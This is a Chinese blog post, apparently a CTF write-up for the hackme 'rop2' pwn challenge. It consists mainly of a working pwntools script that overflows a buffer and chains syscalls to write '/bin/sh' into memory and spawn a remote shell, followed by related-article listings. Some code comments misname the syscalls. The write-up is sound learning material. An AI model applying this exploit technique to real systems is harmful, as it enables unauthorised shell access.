ROP2 ROP的启蒙题

最新推荐文章于 2021-09-18 14:33:15 发布
最新推荐文章于 2021-09-18 14:33:15 发布
阅读量375 收藏
点赞数
分类专栏: CTF 文章标签: ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowleopard_bin/article/details/81431600
版权 
from pwn import *
cn = remote('hackme.inndy.tw',7703)
#context.log_level='debug'
elf = ELF('rop2')

syscall = elf.symbols['syscall']
print "%x"%syscall
over = elf.symbols['overflow']
bss = elf.bss()
cn.recvuntil('Give me your ropchain:')
pay = 'a'*16
pay+= p32(syscall)#ret_addr
pay+= p32(over)#fake_ret_addr
pay+= p32(3)+p32(0)+p32(bss)+p32(8)#param
#syscall(3,0,bss,8)=write(0,bss,8)
#先往bss写入/bin/sh
cn.sendline(pay)
cn.send('/bin/sh\0')

pay='a'*16
pay+= p32(syscall)#ret_addr
pay+= 'a'*4#fake_ret_addr
pay+= p32(11)+p32(bss)+p32(0)+p32(0)#param
#syscall(11,bss,0,0)=system(bss)
cn.sendline(pay)

cn.interactive()

padding+返回地址+执行完syscall后的返回地址+参数

snowleopard_bin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习 可用于练习基础的ROP
rop and rop2 wp
zszcr的博客
04-02 512
目来源:国外的一个ctf平台https://hackme.inndy.tw/ rop目提示:ROP buffer overflow 很明显是一个栈溢出 要用rop来获取shell防护机制发现至开启了NX 拖到IDA反编译一下 可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接我们可以通过ROPgadget 来直接构造ropchain命令为 ROPgadget --binary...
SetROP2
I am a coder
03-25 3748
<br />CDC::SetROP2<br />int SetROP2(int nDrawMode);<br />返回值:绘图模式的前一次取值。可以取联机文档“Windows SDK”中提供的任意值。<br />参数: nDrawMode 指定新的绘制模式,可以为下列值之一:<br />· R2_BLACK 像素始终为黑色。  <br />· R2_WHITE 像素始终为白色。  <br />· R2_NOP 像素保持不变。  <br />· R2_NOT 像素为屏幕颜色的反色。  <br />· R2_C
rop2
weixin_30713953的博客
06-04 85
根据nDrawMode设置的方式重新设定绘图的方式,下面就不同的nDrawMode值具体解释绘图模式是如何改变的。   首先就nDrawMode的取值有以下的情况:    1、R2_BLACKPixel is always black. //所有绘制出来的像素为黑色   2、R2_WHITEPixel is always white. //所有绘制出来的像素为白色    3、R2_NOPPi...
pwn-ROP(2)
aitangdao4981的博客
06-13 109
通过int80系统只对静态编译有效,动态编译需要用其他方法 本提供了一个地址输入端,输入函数地址会返回该函数的实际地址,我们用得到的实际地址-偏移地址=基地址,然后用基地址+任意函数的偏移地址就可以得到实际地址,就可以调用gets、system等函数,利用溢出点传入shell。 首先,用objdump看一下用到的puts函数的跳转地址 exp中先传入0x804a01...
hackme.inndy.tw的rop2
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2目如果网站被墙或者关闭请从这里下载
rop轻松谈.pdf
10-21
本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow、ret2libc/ret2text、Return Oriented Programming等知识点。 ROP技术的基本概念 ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回...
rop开放平台
04-12
2. **ROP链生成器**:用户可以输入想要执行的命令或函数调用,平台会自动寻找合适的gadgets并构建完整的ROP链。 3. **沙箱环境**:提供安全的环境进行实验,防止攻击对用户的真实系统造成损害。 4. **教学资源**:...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
pwn --rop
Vccxx的博客
04-08 2028
rop练习—Very Secure Systemrop 真爽。。目链接:http://pan.baidu.com/s/1eSd0XTg 注:.bak是原,原有个过10s自动退出程序的设置,不好调试,我用ida打了个patch,就是另一个文件,两个文件只有这一个区别漏洞分析:这个程序是静态加载的,所以got表没有用,顺带dynelf也不行,也没提供libc。但是有一个函数可以溢出,但是只溢出了
pwn学习资料整理——ROP技术(pwn_rop2
08-30
pwn学习资料整理——ROP技术(pwn_rop2
[pwn]ROP:三道讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
roprop2目的wp
一个码农的笔记
10-17 4465
https://hackme.inndy.tw/scoreboard/ 目很有趣,我做了roprop2这两个目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
hackme pwn rop2 [syscall + rop]
ACdream
02-05 511
先checksec一下: 有个大概思路:rop过NX main中和overflow函数里都有syscall函数,如下: 观察到这里有缓冲区溢出!"A" * 0xC! 先来学习syscall函数: syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询: cat -n /usr/include/x86_64-linux-gnu/...
pwn——rop练习
sjt670994562的博客
09-17 583
hackme——ROP2 这道用了一个比较新的方法,去寻找栈溢出的点,他用了syscall调用的相关函数,其中参数的第一位代表序号既调用的哪一个函数,我们称为syscall table调用号,这里4是write 3是read 这里我们用到了 locate unistd_32 这里有大佬的文章 https://blog.csdn.net/mydo/article/details/44997901...
PWN 学习—某平台ROP2 writeup
SNAKEのBlog
08-01 457
64位栈帧学习 writeup 本能反应 RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过 NX:NX enabl...
Windows16种二元光栅操作(ROP2)运算方式
hopyGreat的博客
01-02 2861
本文参考自 《Windows程序设计(第5版,珍藏版)》显示器上所显示的线条外观受定义在设备环境中的绘图模式影响。画一条直线,其颜色由画笔的颜色和画线显示区域的颜色共同确定。当Windows使用一个画笔绘制直线时, 它实际上是在将画笔的像素颜色和目标显示表面的像素颜色按位进行布尔运算。对像素颜色执行一个按位布尔运算称为“光栅操作”(raster operation, ROP),简称ROP。因为绘制
ROP Emporium一系列
weixin_44296844的博客
12-21 465
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
64位栈溢出简单rop与简单例的复现
goat_2003的博客
09-18 654
首先还是找到关键函数 可以看到有read栈溢出漏洞,有system函数,查看字符串,还可以看到"/bin/sh",既然这样,我们便可以一步到位直接通过rop将/bin/sh装入system函数中getshell。 如何通过rop实现传参呢?64位ELF是通过寄存器存放参数的,所以我们要想办法将/bin/sh放入rdi中并紧接着调用system函数。 那么该如何实现呢?我们假设一下,先通过pop edi将/bin/sh的地址压入edi中,然后再执行ret,并将此时的esp所指向栈空间的值改为system函数
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn目。在这个目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值